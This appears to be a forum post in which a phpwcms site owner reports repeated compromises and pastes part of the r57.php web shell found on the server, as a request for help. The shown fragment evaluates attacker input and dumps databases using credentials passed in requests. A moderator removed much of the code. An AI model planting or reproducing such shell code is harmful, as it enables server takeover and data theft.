I posted this one not too long ago...Oliver Georgi wrote: Normally phpwcms is (should be) safe - and I have not heard of any other hacked 1.3.3.
Oliver
http://www.phpwcms.de/forum/viewtopic.php?t=15646
I've been hacked over and oever and over again. It's getting really old and I'm on the verge of moving to something else if I can't find out why.
I really love the program and would hate to have to transition to something else...but when I have about 40 sites on the same server and ONLY the phpWCMS ones are getting hit...something is wrong.
My hosting: Fatnetwork (reseller hosting, shared servers, globalvars is on - not sure how to turn them off if I don't own the server - and safemode is off)
Also, here is the code for the file that I found on my server allowing it to gain access to virtually everything...I can't read arabic, so I'm not sure just how far it really goes. Oliver, I hope you can make some REAL sense of this and hopefully identify some way we can protect ourselves from it.
The file was saved as r57.php and if you Google that, there are TONS of reports of people being hacked by it. Mambo, phpWCMS, and other users alike.
Code: Select all
","",$eval);
@eval($eval);}
if ($_POST['cmd']=="mysql_dump")
{
if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); }
$sql = new my_sql();
$sql->db = $_POST['db'];
$sql->host = $_POST['db_server'];
$sql->port = $_POST['db_port'];
$sql->user = $_POST['mysql_l'];
$sql->pass = $_POST['mysql_p'];
$sql->base = $_POST['mysql_db'];
if(!$sql->connect()) { echo "[-] ERROR! Can't connect to SQL server"; }
else if(!$sql->select_db()) { echo "[-] ERROR! Can't select database"; }
else if(!$sql->dump($_POST['mysql_tbl'])) { echo "[-] ERROR! Can't create dump"; }
else {
if(empty($_POST['dif'])) { foreach($sql->dump as $v) echo $v."\r\n"; }
else if($fp){ foreach($sql->dump as $v) @fputs($fp,$v."\r\n"); }
else { echo "[-] ERROR! Can't write in dump file"; }
}
}
echo "</textarea></div>";
echo "</b>";
echo "</td></tr></table>";
echo "<table width=100% cellpadding=0 cellspacing=0>";
...........
[Notice: Code partially removed by Oliver]